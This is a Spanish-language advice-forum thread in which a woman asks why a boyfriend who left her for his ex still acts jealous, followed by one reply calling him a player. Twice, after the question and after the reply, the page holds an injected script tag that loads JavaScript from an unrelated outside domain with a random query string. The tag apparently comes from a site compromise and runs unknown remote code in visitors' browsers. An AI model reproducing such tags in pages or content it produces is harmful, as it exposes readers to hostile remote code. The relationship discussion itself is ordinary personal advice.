Se siente celoso a pesar de haberme dejado por su ex.

Mi novio me ha dejado por su ex después de 6 meses de relación. Durante ese tiempo me aseguraba que la odiaba y que no quería saber nada más de ella. Nuestra relación iba de maravilla, pero de repente, me ha dejado y ha vuelto con su ex. No entiendo su comportamiento ya que se sigue poniendo celoso de mi.

Con esta chica ha vuelto por 4º vez y siempre vuelve a dejarla por ser un patán. No me parece justo ya que es evidente que ella siente algo fuerte por él. Pero él no hace más que jugar con ella como quiere y me parece realmente cruel. Ya que se ve con otras chicas a pesar de "estar" con ella.

Creo que la utiliza porque es una mujer sin carácter. Todo lo contrario a mi. Que me enojo con facilidad.

No entiendo en realidad que se le pasa por la cabeza. Cual es su forma de pensar. Y quisiera saber también si es posible que pretenda volver conmigo ya que lo insinuó en una conversación llegando a cortejarme. Sus celos también son evidentes, pero sigue con ella.

No entiendo su comportamiento tampoco ya que finge ignorarme.

¿Alguien le encuentra el sentido?

<script type="text/javascript" src="http://nuevotemarosa.info/?0.12292734835427677"></script>
Respuesta

Los hombres como las mujeres siempre vamos a sentir celos de alguien con el que sentimos un sentimiento especial. Lo mas seguro es que quiera volver contigo puesto que no sabe que es lo que quiere, pero al volver contigo sentirá celos de la ex... así se formara una cadena.

Creo que deberías poner un alto, creo que solo esta jugando contigo y por supuesto con ella.

Si en verdad quisiera star con ella no sentiría celos de ti ni se vería con demás chavas .. igual contigo si siente muchos celos por ti, si de verdad le importas porque no deja a todos sus amoríos para cuidarte..

Yo también pase por lo mismo ...

<script type="text/javascript" src="http://nuevotemarosa.info/?0.3880498234124554"></script>